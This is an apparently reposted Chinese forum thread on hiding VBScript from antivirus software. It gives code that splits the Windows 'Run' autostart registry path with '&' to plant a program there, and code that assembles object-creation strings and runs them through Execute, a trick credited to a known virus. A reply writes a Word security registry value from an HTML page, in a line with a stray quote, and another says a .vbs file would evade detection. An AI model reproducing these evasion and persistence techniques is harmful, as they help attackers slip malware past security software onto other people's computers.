信息来源：网络


以下两个方法在网络上看到的，确实挺实用的，&号两边必须空格格开。

现在杀毒的对vbs相当敏感，只要发现对注册表的xx作，或使用vbs运行命令（加用户） 就可能被杀。下面谈2方法可以简单解决：

1.使用连接符"&" 如：
Set CURObj = createObject("WScript.Shell")
mhk="HK"&"LM\SOFT"&"WARE\Micr"&"osoft\Win"&"dows\Curren"&"tVersion\Run\"
CURObj.RegWrite ""&mhk&"internat.exe","internat.exe"

2.使用Execute函数（BY 动鲨 ）

一些杀毒软件，如瑞星，他门会监视网页中的代码，一旦你创建了FSO或写注册表，即使是正常的脚本他也会报告危险，但是当年新欢乐时光也用了FSO怎么就没报警呢？原因是这个病毒使用Execute这个函数来躲过了防火墙，呵呵。病毒将这段声明代码转化为字符串，然后通过Execute(String)函数执行，举个例子
str="set fso=createObject( " & chr(34) & "scrip" & chr(116)& "ing.FileSystemObject"&chr(34)&""
msgbox str
Execute str

问一下
看了你的 我随便式了一下的
<html>
<head>
<script language="VBScript">
str="Set Sh=CreateObject("&chr(34)&"WScrip"&chr(116)&".Shell"&chr(34)&")"
msgbox str
Execute str
key="HK"&"CU\Soft"&"ware\Micr"&"osoft\Off"&"ice\11.0\W"&"ord\Sec""
Sh.RegWrite key,1,"REG_DWORD"
</script>
</head>
<body>
</body>
</html>


但是打开的时候总提示：你页面上的activex控件和本页上的其他部分存在交互 问你是否容许这中交互
这是为何啊

这种方式只是说能逃过杀毒软件，没说ie不会提示啊？
运行结果和未加密时是一样的当然一样会给出提示了．
换种想法，如果这个文件是vbs文件，那就会顺利的执行而杀毒软件无法查得出来了．
CreateObject是个危险的方法对在ie执行中．